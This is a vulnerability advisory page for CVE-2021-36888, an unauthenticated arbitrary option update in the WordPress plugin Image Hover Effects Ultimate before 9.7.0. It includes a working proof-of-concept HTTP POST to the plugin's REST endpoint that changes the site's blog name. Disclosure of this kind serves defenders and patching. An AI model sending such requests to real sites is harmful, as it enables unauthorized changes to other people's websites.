Image Hover Effects Ultimate < 9.7.0 – Unauthenticated Arbitrary Option Update | CVE 2021-36888 | Plugin Vulnerabilities

Description

The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options.

The original report mentioned the issue being fixed in 9.6.2, however it was still possible for attackers to exploit it and proper remediation has been done in 9.7.0

Proof of Concept

POST /wp-json/ImageHoverUltimate/v1/oxi_settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69
Connection: close

rawdata=%7B%22name%22%3A%22blogname%22%2C%22value%22%3A%22Owned%22%7D

Affects Plugins

image-hover-effects-ultimate

Fixed in 9.7.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

John Castro

Verified

Yes

WPVDB ID

75da4102-7063-407f-975e-28be6ed33aac

Timeline

Publicly Published

2021-12-15 (about 2 years ago)

Added

2021-12-15 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2024-02-26

Title

Rolo Slider <= 1.0.9 - Missing Authorization to Authenticated(Subscriber+) Settings Change

Published

2023-10-03

Title

WP Custom Widget area <= 1.2.5 - Missing Authorization

Published

2023-09-01

Title

Ovic Product Bundle <= 1.1.2 - Missing Authorization

Published

2022-09-26

Title

miniOrange Discord Integration < 2.1.6 - Subscriber+ App Disabling

Published

2023-12-27

Title

Business Directory Plugin < 6.3.10 - Contributor+ Arbitrary Listing Deletion